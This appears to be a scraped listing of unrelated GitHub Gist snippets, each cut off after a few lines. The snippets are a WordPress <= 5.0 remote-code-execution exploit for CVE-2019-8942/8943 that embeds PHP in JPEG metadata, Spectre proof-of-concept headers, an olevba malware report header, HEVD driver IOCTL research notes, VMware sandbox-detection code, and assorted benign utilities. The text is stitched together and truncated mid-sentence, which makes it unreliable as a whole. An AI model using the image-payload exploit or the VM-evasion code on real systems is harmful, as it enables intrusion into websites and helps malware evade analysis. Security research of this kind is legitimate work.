@allyshka
allyshka / wordpress-rce.js
Created March 1, 2019 22:51
WordPress <= 5.0 exploit code for CVE-2019-8942 & CVE-2019-8943
var wpnonce = '';
var ajaxnonce = '';
var wp_attached_file = '';
var imgurl = '';
var postajaxdata = '';
var post_id = 0;
var cmd = '<?php phpinfo();/*';
var cmdlen = cmd.length
var payload = '\xff\xd8\xff\xed\x004Photoshop 3.0\x008BIM\x04\x04'+'\x00'.repeat(5)+'\x17\x1c\x02\x05\x00\x07PAYLOAD\x00\xff\xe0\x00\x10JFIF\x00\x01\x01\x01\x00`\x00`\x00\x00\xff\xdb\x00C\x00\x06\x04\x05\x06\x05\x04\x06\x06\x05\x06\x07\x07\x06\x08\x0a\x10\x0a\x0a\x09\x09\x0a\x14\x0e\x0f\x0c\x10\x17\x14\x18\x18\x17\x14\x16\x16\x1a\x1d%\x1f\x1a\x1b#\x1c\x16\x16 , #&\x27)*)\x19\x1f-0-(0%()(\xff\xc0\x00\x0b\x08\x00\x01\x00\x01\x01\x01\x11\x00\xff\xc4\x00\x14\x00\x01'+'\x00'.repeat(15)+'\x08\xff\xc4\x00\x14\x10\x01'+'\x00'.repeat(16)+'\xff\xda\x00\x08\x01\x01\x00\x00?\x00T\xbf\xff\xd9';
var img = payload.replace('\x07PAYLOAD', String.fromCharCode(cmdlen) + cmd);
@xpn
xpn / clr_via_native.c
Created April 11, 2018 21:34
A quick example showing loading CLR via native code
#include "stdafx.h"
int main()
{
ICLRMetaHost *metaHost = NULL;
IEnumUnknown *runtime = NULL;
ICLRRuntimeInfo *runtimeInfo = NULL;
ICLRRuntimeHost *runtimeHost = NULL;
IUnknown *enumRuntime = NULL;
LPWSTR frameworkName = NULL;
@JohnLaTwC
JohnLaTwC / 8ef117d174a5f4bfac84d6dcc99278fc8ff4add8c6f8b569411876779727ad75.txt
Created March 24, 2018 21:31
VBA / PS1 / Assembly 8ef117d174a5f4bfac84d6dcc99278fc8ff4add8c6f8b569411876779727ad75
## uploaded by @JohnLaTwC
## Sample hash: 8ef117d174a5f4bfac84d6dcc99278fc8ff4add8c6f8b569411876779727ad75
olevba 0.52dev7 - http://decalage.info/python/oletools
Flags Filename
----------- -----------------------------------------------------------------
OLE:MAS-HB-- 8ef117d174a5f4bfac84d6dcc99278fc8ff4add8c6f8b569411876779727ad75
===============================================================================
FILE: 8ef117d174a5f4bfac84d6dcc99278fc8ff4add8c6f8b569411876779727ad75
Type: OLE
-------------------------------------------------------------------------------

TL;DR: Using symbolic execution to recover driver IOCTL codes that are computed at runtime.

The goal here is to find valid IOCTL codes for the HackSysExtremeVulnerableDriver by analyzing the binary. The control flow varies between the binary and source due to compiler optimizations. This results in a situation where only a few IOCTL codes in the assembly are represented as a constant with the remaining being computed at runtime.

The code in hevd_ioctl.py is an approximation of the control flow of the compiled IrpDeviceIoCtlHandler function. The effects of the compiler optimization are more pronounced when comparing this code to the original C function. To comply with the requirements of the PyExZ3 module, the target function is named after the script's filename, and the `ex

@ErikAugust
ErikAugust / spectre.c
Last active May 22, 2024 23:07
Spectre example code
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#ifdef _MSC_VER
#include <intrin.h> /* for rdtscp and clflush */
#pragma optimize("gt",on)
#else
#include <x86intrin.h> /* for rdtscp and clflush */
#endif
@mattifestation
mattifestation / GetSTLCertHashes.ps1
Created December 20, 2017 22:52
A crude authroot.stl parser
# http://www.bouncycastle.org/csharp/
$BouncyCastlePath = 'Path\To\BouncyCastle.Crypto.dll'
$BouncyCastle = Add-Type -Path $BouncyCastlePath -PassThru
function Get-TrustedRootCertificateHash {
[OutputType([String])]
[CmdletBinding()]
param (
[Parameter(Mandatory = $True, ValueFromPipelineByPropertyName = $True)]
@Akagi201
Akagi201 / router.pi-1.md
Created October 16, 2016 14:27 — forked from snakevil/router.pi-1.md
Building a super router with a Raspberry Pi 3B, part 1: initial installation

Building a super router with a Raspberry Pi 3B, part 1: initial installation

The rich feature set and strong performance of the new Raspberry Pi 3B made me want one. Considering that the Netgear WNDR3700v2 at home has been in service for more than four years, I went ahead and bought a Raspberry Pi 3B to turn into the new router.

WARNING: All commands in this article are for reference only; never copy and paste them blindly!

〇 Installing the system

// Base code taken from
// https://github.com/mfontanini/Programs-Scripts/blob/master/constexpr_hashes/md5.h
// and expanded to include a main function
#ifndef CONSTEXPR_HASH_MD5_H
#define CONSTEXPR_HASH_MD5_H
#include <array>
#include <iostream>
#include <cstdint>
#!/usr/bin/env python
# Rulz.py
# Author: Nick Landers (@monoxgas) - Silent Break Security
import os
import sys
import argparse
import re
import binascii
import codecs
@c0d3inj3cT
c0d3inj3cT / vmware-detect.c
Created December 11, 2013 05:08
This code will scan the process address space of csrss.exe for the string, "MS_VM_CERT". It is the OEM String of VMWare present in the SMBIOS structures.
/*
Detect VMWare using OEM String in Memory
Tested on Windows XP SP3/VMWare Workstation 7.1.0
c0d3inj3cT
*/
#include <windows.h>
#include <stdio.h>
#define MARKER "MS_VM_CERT"